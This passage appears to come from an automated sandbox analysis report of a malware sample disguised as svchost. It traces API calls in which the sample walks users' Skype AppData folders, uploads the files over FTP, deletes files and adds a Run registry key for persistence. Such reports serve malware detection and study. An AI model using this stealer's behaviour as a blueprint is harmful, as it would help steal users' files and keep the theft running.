      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: Window$PaintProc$BeginCreateMessagePostQuitTimer
      • String ID: edit
      • API String ID: 2127186440-2167791130
      • Opcode ID: 00d6fa56793c44f1ebe58671d36ccf6c18734e68c1da44a8afd97370d8d6d054
      • Instruction ID: 33b3fde21931028e5c382d804ba468cec619012ac5b889cdb20f3593a96f7c0e
      • Opcode Fuzzy Hash: 00d6fa56793c44f1ebe58671d36ccf6c18734e68c1da44a8afd97370d8d6d054
      • Instruction Fuzzy Hash: E341D571254208ABD318DF78EC5EFBB37AAEB49721F40850EF50E8A2D1DF619C508795

      Control-flow Graph

      APIs
      • LoadStringA.USER32(?,00000067,006783E8,00000064), ref: 00671399
      • LoadStringA.USER32(?,0000006D,00678380,00000064), ref: 006713A5
        • Part of subcall function 00674470: LoadIconA.USER32 ref: 006744A9
        • Part of subcall function 00674470: LoadCursorA.USER32(00000000,00007F00), ref: 006744B6
        • Part of subcall function 00674470: LoadIconA.USER32 ref: 006744DF
        • Part of subcall function 00674470: RegisterClassExA.USER32(?), ref: 006744EA
      • CreateWindowExA.USER32(00000000,00678380,006783E8,00CF0000,00000064,00000064,000004B0,00000258,00000000,00000000,?,00000000), ref: 006713DA
      • ShowWindow.USER32(00000000,00000000), ref: 006713ED
      • UpdateWindow.USER32(00000000), ref: 006713F4
      • LoadAcceleratorsA.USER32(?,0000006D), ref: 006713FD
      • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00671416
      • TranslateAcceleratorA.USER32(?,00000000,?), ref: 0067143B
      • TranslateMessage.USER32(?), ref: 00671446
      • DispatchMessageA.USER32(?), ref: 0067144D
      • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0067145E
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: Load$Message$Window$IconStringTranslate$AcceleratorAcceleratorsClassCreateCursorDispatchRegisterShowUpdate
      • String ID:
      • API String ID: 2655949961-0
      • Opcode ID: b6dec6ad48cfe68cda134db7470a2456bf6aa731a33bbb9fbfa9369dd6906862
      • Instruction ID: e6f1639c80c78f48b64e3b749f12670d1276b2f10fd916f8671b223a2b7c6623
      • Opcode Fuzzy Hash: b6dec6ad48cfe68cda134db7470a2456bf6aa731a33bbb9fbfa9369dd6906862
      • Instruction Fuzzy Hash: 0C21B6323807057BE310DB6CDC4AF9B73AAAB85F14F448405F748AB1C1EBB1E9458B65

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 249 674470-6744f4 LoadIconA LoadCursorA LoadIconA RegisterClassExA
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: Load$Icon$ClassCursorRegister
      • String ID: 0$m
      • API String ID: 4202395251-432128193
      • Opcode ID: 92bfdaef2626f0010a0f3d02303da8c174079a85dbf1070fbc220080576f4497
      • Instruction ID: 29f58112f5f1a6abff0ddf2fb9db82e99e4524fcdd1bb691235f48a9b63a6c63
      • Opcode Fuzzy Hash: 92bfdaef2626f0010a0f3d02303da8c174079a85dbf1070fbc220080576f4497
      • Instruction Fuzzy Hash: F901FBB0809300AFE300DF64D91870BBFE5BB88704F80591DF49897281D7BA85088F96

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 250 6724f0-6725b5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 253 6725b7 250->253 254 6725f3-67267d ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FindFirstFileA FindNextFileA 250->254 255 6725c0-6725f1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 253->255 256 672683-672685 254->256 257 672a3f-672b01 FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA 254->257 255->254 255->255 258 672690-672698 256->258 271 672b07-672b10 257->271 272 6734e0-67355a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 call 674bfc 257->272 260 672a20-672a35 FindNextFileA 258->260 261 67269e-67273b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FindFirstFileA 258->261 260->258 263 672a3b 260->263 264 672741-672749 261->264 265 67288e-67289f FindNextFileA 261->265 263->257 264->265 267 67274f-672757 264->267 265->260 269 6728a5 265->269 267->265 270 67275d-67288b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 267->270 273 6728b0-6728b8 269->273 270->265 277 672b18-672b29 271->277 274 6728be-6728c6 273->274 275 672a09-672a1a FindNextFileA 273->275 274->275 281 6728cc-6728d4 274->281 275->260 275->273 279 672c93-672cbb ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 277->279 280 672b2f-672b9f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 277->280 287 672cc1-672d1c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 279->287 288 67334f-673367 279->288 284 672bd4-672c8e ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA 280->284 285 672ba1-672bd2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 280->285 281->275 286 6728da-672a06 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 281->286 312 67333d-67334b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 284->312 285->284 285->285 286->275 293 672d53-672dff ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 287->293 294 672d1e 287->294 291 672b12 288->291 292 67336d-67336f 288->292 291->277 292->272 297 673375-673394 memset 292->297 299 672e01-672e16 fgetc 293->299 298 672d20-672d51 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 294->298 301 673396 297->301 302 6733be-67342c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 RegOpenKeyExA RegSetValueExA RegCloseKey 297->302 298->293 298->298 303 672e27-672e36 299->303 304 672e18-672e24 fputc 299->304 306 6733a0-6733bc ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 301->306 302->272 317 673432-6734da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z memset ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z CreateProcessA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 302->317 308 672fa6-672fa9 303->308 309 672e3c-672ebf ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 fclose ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 303->309 304->303 306->302 306->306 308->299 311 672faf-672fcd fclose * 2 308->311 318 672ef4-672fa3 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 309->318 319 672ec1-672ef2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 309->319 315 673336 311->315 316 672fd3-67304e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 311->316 312->288 315->312 320 673083-673171 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 316->320 321 673050-673081 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 316->321 317->272 318->308 319->318 319->319 324 6731a6-673247 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 320->324 325 673173-6731a4 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 320->325 321->320 321->321 326 673283-673330 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 324->326 327 673249 324->327 325->324 325->325 326->315 326->316 329 673250-673281 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 327->329 329->326 329->329
      APIs
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(start ftp skype,?,?,?,AED9119B), ref: 00672545
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,AED9119B,00000000,00675699,000000FF,00672550,?,?,?,AED9119B), ref: 00671322
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,AED9119B), ref: 00671332
        • Part of subcall function 006712F0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,AED9119B), ref: 0067133F
        • Part of subcall function 006712F0: SendMessageA.USER32(00010404,0000000C,00000000,00000000), ref: 00671351
        • Part of subcall function 006712F0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,AED9119B), ref: 00671363
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 0067255F
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00672577
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,C:\Users\%s\AppData\Roaming\Skype\,00000000), ref: 0067258C
      • sprintf.MSVCR90 ref: 00672593
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000), ref: 006725AC
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000), ref: 006725D2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000), ref: 006725E8
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000), ref: 00672605
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,00000000), ref: 00672612
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?), ref: 0067263B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00672659
      • FindFirstFileA.KERNEL32(00000000), ref: 00672660
      • FindNextFileA.KERNEL32(00000000,?), ref: 00672675
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 006726B6
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,0067660C), ref: 006726CE
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90 ref: 006726E3
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006726F8
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067270D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?), ref: 00672724
      • FindFirstFileA.KERNEL32(00000000), ref: 0067272B
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?), ref: 00672775
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,?,00000000,00676378), ref: 0067278D
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00000000,?,?,?,?,00000000,00676378), ref: 006727A8
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$A?$basic_string@$??$?D@1@@std@@D@2@@0@V10@V?$basic_string@$??0?$basic_string@??1?$basic_string@FileFindV01@$?erase@?$basic_string@FirstV01@@V12@Y?$basic_string@$??4?$basic_string@MessageNextSendsprintf
      • String ID: $ $ $ $ $ $%d%s$%s\%s$-$C:\Users\%s\AppData\Roaming\Skype\$Skype$Software\Microsoft\Windows\CurrentVersion\Run\$\skype$a$m$part$start ftp skype$v_%d$v_%d\skype\%s$v_%d\skype\%s\%d%s
      • API String ID: 1343869211-4037236381
      • Opcode ID: 9d923e6a2751d91ba5f547ebe677fc00fa764e14ae26e8fb09769e7a01a095ba
      • Instruction ID: 03e283a779339648d4a537057687d521de93be7a8b7703f2c5eb8196daae6680
      • Opcode Fuzzy Hash: 9d923e6a2751d91ba5f547ebe677fc00fa764e14ae26e8fb09769e7a01a095ba
      • Instruction Fuzzy Hash: 3D924A71108781DFD728DB64DD59BEE7BAABB94305F00990CF58E832A1DB705988CF62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 331 6725b9 332 6725c0-6725f1 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 331->332 332->332 333 6725f3-67267d ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FindFirstFileA FindNextFileA 332->333 334 672683-672685 333->334 335 672a3f-672b01 FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA 333->335 336 672690-672698 334->336 349 672b07-672b10 335->349 350 6734e0-67355a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 call 674bfc 335->350 338 672a20-672a35 FindNextFileA 336->338 339 67269e-67273b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FindFirstFileA 336->339 338->336 341 672a3b 338->341 342 672741-672749 339->342 343 67288e-67289f FindNextFileA 339->343 341->335 342->343 345 67274f-672757 342->345 343->338 347 6728a5 343->347 345->343 348 67275d-67288b ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 345->348 351 6728b0-6728b8 347->351 348->343 355 672b18-672b29 349->355 352 6728be-6728c6 351->352 353 672a09-672a1a FindNextFileA 351->353 352->353 359 6728cc-6728d4 352->359 353->338 353->351 357 672c93-672cbb ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fopen 355->357 358 672b2f-672b9f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 3 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 355->358 365 672cc1-672d1c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 357->365 366 67334f-673367 357->366 362 672bd4-672c8e ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 6712f0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 FtpPutFileA 358->362 363 672ba1-672bd2 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z 